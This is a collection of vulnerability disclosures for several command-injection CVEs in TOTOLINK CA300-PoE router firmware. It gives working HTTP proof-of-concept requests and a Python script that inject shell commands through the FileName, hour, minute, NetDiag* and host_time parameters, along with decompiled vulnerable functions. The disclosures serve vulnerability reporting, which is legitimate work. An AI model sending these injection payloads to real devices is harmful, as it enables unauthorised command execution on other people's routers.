TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the FileName parameter in the setUploadUserData function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setUploadUserData.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" : "setting/setUploadUserData", "ContentLength":"10485", "FileName": "a|mkdir /setUploadUserData_1111;"}
    

    int __fastcall setUploadUserData(int a1, int a2, int a3)
    {
      const char *FileName_v; // $s3
      int ContentLength_v; // $s1
      int Object; // $s0
      int v9; // $s1
      int v10; // $v0
      int v11; // $s1
      const char *v13; // $a0
      int String; // $v0
      int v15; // $s2
      int v16; // $s0
      char v17[256]; // [sp+24h] [-104h] BYREF
    
      FileName_v = (const char *)websGetVar(a2, "FileName", "");
      ContentLength_v = websGetVar(a2, "ContentLength", "");
      set_action(3);
      Object = cJSON_CreateObject();
      v9 = strtol(ContentLength_v, 0, 10);
      if ( v9 < 1000 )
      {
        v13 = "MSG_userData_error";
        goto LABEL_7;
      }
      if ( v9 >= 1048577 )
      {
        v13 = "MSG_userData_big";
    LABEL_7:
        String = cJSON_CreateString(v13);
        cJSON_AddItemToObject(Object, "upgradeERR1", String);
        unlink(FileName_v);
        set_action(0);
        goto LABEL_5;
      }
      if ( !fork(0) )
      {
        sleep(2);
        memset(v17, 0, sizeof(v17));
        v15 = malloc(v9);
        v16 = f_read(FileName_v, v15, 0, v9);
        if ( CS_DBG == 1 )
          printf("(%s:%d)=> inLen=[%d]\n", "setUploadUserData", 350, v16);
        f_write("/tmp/plugin.tar.gz", v15, v16, 0);
        free(v15);
        sprintf(v17, "md5sum %s | awk '{ print $1 }' > %s", "/tmp/plugin.tar.gz", "/userdata/SysPluginMd5");
        CsteSystem(v17, 0);
        CsteSystem("tar zxvf /tmp/plugin.tar.gz -C /tmp", 0);
        CsteSystem("sh /tmp/plugin/plugin.sh", 0);
        CsteSystem("rm -rf /tmp/plugin.tar.gz", 0);
        sprintf(v17, "rm -rf %s", FileName_v);
        CsteSystem(v17, 0);
        set_action(0);
        exit(1);
      }
      v10 = cJSON_CreateString("1");
      cJSON_AddItemToObject(Object, "upgradeStatus", v10);
    LABEL_5:
      v11 = cJSON_Print(Object);
      websGetCfgResponse(a1, a3, v11);
      cJSON_Delete(Object);
      free(v11);
      return 0;
    }

CVE-2023-24148: CVE-vulns/setUploadUserData.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the hour parameter in the setRebootScheCfg function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setRebootScheCfg.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setRebootScheCfg","mode" : "1", "hour": "';mkdir /hour_1111;'"}
    

    int __fastcall setRebootScheCfg(int a1, int a2, int a3)
    {
      int mode_v; // $s5
      int week_v; // $s3
      const char *hour_v; // $fp
      const char *minute_v; // $s7
      int recHour_v; // $s0
      int v9; // $v0
      int v11; // $v0
      int i; // $s0
      _BYTE *v13; // $v0
      char *v14; // $a0
      int v15; // $s0
      int v16; // $s0
      char v19[256]; // [sp+2Ch] [-244h] BYREF
      char v20[128]; // [sp+12Ch] [-144h] BYREF
      char v21[128]; // [sp+1ACh] [-C4h] BYREF
      int v22[16]; // [sp+22Ch] [-44h] BYREF
    
      memset(v20, 0, sizeof(v20));
      memset(v21, 0, sizeof(v21));
      memset(v19, 0, sizeof(v19));
      mode_v = websGetVar(a2, "mode", "0");
      week_v = websGetVar(a2, "week", "");
      hour_v = (const char *)websGetVar(a2, "hour", "");
      minute_v = (const char *)websGetVar(a2, "minute", "");
      recHour_v = websGetVar(a2, "recHour", "0");
      cs_uci_set("system.reboot.mode", mode_v);
      cs_uci_set("system.reboot.week", week_v);
      cs_uci_set("system.reboot.hour", hour_v);
      cs_uci_set("system.reboot.minute", minute_v);
      cs_uci_set("system.reboot.recHour", recHour_v);
      cs_uci_commit("system");
      strcpy(v19, "sed -i /reboot/d /etc/crontabs/root");
      CsteSystem(v19, 0);
      CsteSystem("killall sche_reboot", 0);
      v9 = atoi(mode_v);
      if ( v9 == 1 )                                // mode=1
      {
        v11 = atoi(week_v);
        if ( v11 == 255 )
        {
          strcpy(v21, "*");
        }
        else if ( v11 )
        {
          for ( i = 1; i != 8; ++i )
          {
            if ( ((atoi(week_v) >> i) & 1) != 0 )
            {
              sprintf(v20, (const char *)&dword_4404, i);
              strcat(v21, v20);
              strcat(v21, &dword_4408);
            }
          }
          v13 = (_BYTE *)strrchr(v21, 44);
          if ( v13 )
            *v13 = 0;
        }
        sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21);
        v14 = v19;
    LABEL_13:
        CsteSystem(v14, 0);
        goto LABEL_3;
      }
      if ( v9 == 2 )
      {
        v15 = atoi(recHour_v);
        if ( v15 > 0 )
        {
          sysinfo(v22);
          v16 = 3600 * v15 - v22[0];
          if ( v16 <= 0 )
          {
            cs_cmd("reboot", 16464, 1);
            goto LABEL_3;
          }
          CsteSystem("killall sche_reboot", 0);
          sprintf(v20, "sche_reboot %ld &", v16);
          v14 = v20;
          goto LABEL_13;
        }
      }
    LABEL_3:
      cs_cmd("/etc/init.d/cron", "restart", 2);
      websSetCfgResponse(a1, a3, "0", "reserv");
      return 0;
    }

CVE-2023-24144: CVE-vulns/setRebootScheCfg_hour.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingSize parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingSize": "100||ls;"}

CVE-2023-24142: CVE-vulns/setNetworkDiag_NetDiagPingSize.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingTimeOut parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingTimeOut": "4||ls;"}

CVE-2023-24141: CVE-vulns/setNetworkDiag_NetDiagPingTimeOut.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the setNetworkDiag function.

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"setting/setNetworkDiag","NetDiagMethod":"0","NetDiagHost":"www.baidu.com|expr 50 - 3;"}
    

POC2:

    import requests
    url = "http://192.168.0.254:80/cgi-bin/cstecgi.cgi"
    cookie = {"Cookie":"SESSION_ID=2:1672999258:2"}
    data = {"topicurl" : "setDiagnosisCfg",
    "ip" : "192.168.1.1||mkdir /test1111;"}
    
    data1 = {'topicurl' : "setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagHost":"www.baidu.com|echo `ls`;"}
    
    response = requests.post(url, cookies=cookie, json=data1)
    print(response.text)
    print(response)
    
    data2 = {"topicurl":"setting/showNetworkDiag"}
    response = requests.post(url, cookies=cookie, json=data2)
    print(response.text)
    print(response)
    
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo

CVE-2023-24139: CVE-vulns/setNetworkDiag_NetDiagHost.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the setNetworkDiag function.

Permalink

Cannot retrieve contributors at this time

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "1", "NetDiagTracertHop": "20||ls;"}
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo，V11 is the value of system.NetDiag.method

CVE-2023-24143: CVE-vulns/setNetworkDiag_NetDiagTracertHop.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin_version parameter in the setUnloadUserData function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin\_version parameter in the function setUnloadUserData****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setUnloadUserData.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" : "setting/setUnloadUserData", "plugin_version": "|mkdir /setUnloadUserData_2222;"}
    

Folder created successfully

CVE-2023-24145: CVE-vulns/setUnloadUserData.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host_time parameter in the NTPSyncWithHost function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host\_time parameter in the function NTPSyncWithHost****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in NTPSyncWithHost.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"}
    

Folder created successfully

CVE-2023-24138: CVE-vulns/NTPSyncWithHost.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingNum parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingNum": "4||ls;"}

CVE-2023-24140: CVE-vulns/setNetworkDiag_NetDiagPingNum.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the minute parameter in the setRebootScheCfg function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setRebootScheCfg.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setRebootScheCfg","mode" : "1", "minute": "';mkdir /minute_1111;'"}
    

    int __fastcall setRebootScheCfg(int a1, int a2, int a3)
    {
      int mode_v; // $s5
      int week_v; // $s3
      const char *hour_v; // $fp
      const char *minute_v; // $s7
      int recHour_v; // $s0
      int v9; // $v0
      int v11; // $v0
      int i; // $s0
      _BYTE *v13; // $v0
      char *v14; // $a0
      int v15; // $s0
      int v16; // $s0
      char v19[256]; // [sp+2Ch] [-244h] BYREF
      char v20[128]; // [sp+12Ch] [-144h] BYREF
      char v21[128]; // [sp+1ACh] [-C4h] BYREF
      int v22[16]; // [sp+22Ch] [-44h] BYREF
    
      memset(v20, 0, sizeof(v20));
      memset(v21, 0, sizeof(v21));
      memset(v19, 0, sizeof(v19));
      mode_v = websGetVar(a2, "mode", "0");
      week_v = websGetVar(a2, "week", "");
      hour_v = (const char *)websGetVar(a2, "hour", "");
      minute_v = (const char *)websGetVar(a2, "minute", "");
      recHour_v = websGetVar(a2, "recHour", "0");
      cs_uci_set("system.reboot.mode", mode_v);
      cs_uci_set("system.reboot.week", week_v);
      cs_uci_set("system.reboot.hour", hour_v);
      cs_uci_set("system.reboot.minute", minute_v);
      cs_uci_set("system.reboot.recHour", recHour_v);
      cs_uci_commit("system");
      strcpy(v19, "sed -i /reboot/d /etc/crontabs/root");
      CsteSystem(v19, 0);
      CsteSystem("killall sche_reboot", 0);
      v9 = atoi(mode_v);
      if ( v9 == 1 )                                // mode=1
      {
        v11 = atoi(week_v);
        if ( v11 == 255 )
        {
          strcpy(v21, "*");
        }
        else if ( v11 )
        {
          for ( i = 1; i != 8; ++i )
          {
            if ( ((atoi(week_v) >> i) & 1) != 0 )
            {
              sprintf(v20, (const char *)&dword_4404, i);
              strcat(v21, v20);
              strcat(v21, &dword_4408);
            }
          }
          v13 = (_BYTE *)strrchr(v21, 44);
          if ( v13 )
            *v13 = 0;
        }
        sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21);
        v14 = v19;
    LABEL_13:
        CsteSystem(v14, 0);
        goto LABEL_3;
      }
      if ( v9 == 2 )
      {
        v15 = atoi(recHour_v);
        if ( v15 > 0 )
        {
          sysinfo(v22);
          v16 = 3600 * v15 - v22[0];
          if ( v16 <= 0 )
          {
            cs_cmd("reboot", 16464, 1);
            goto LABEL_3;
          }
          CsteSystem("killall sche_reboot", 0);
          sprintf(v20, "sche_reboot %ld &", v16);
          v14 = v20;
          goto LABEL_13;
        }
      }
    LABEL_3:
      cs_cmd("/etc/init.d/cron", "restart", 2);
      websSetCfgResponse(a1, a3, "0", "reserv");
      return 0;
    }

Tag

#ubuntu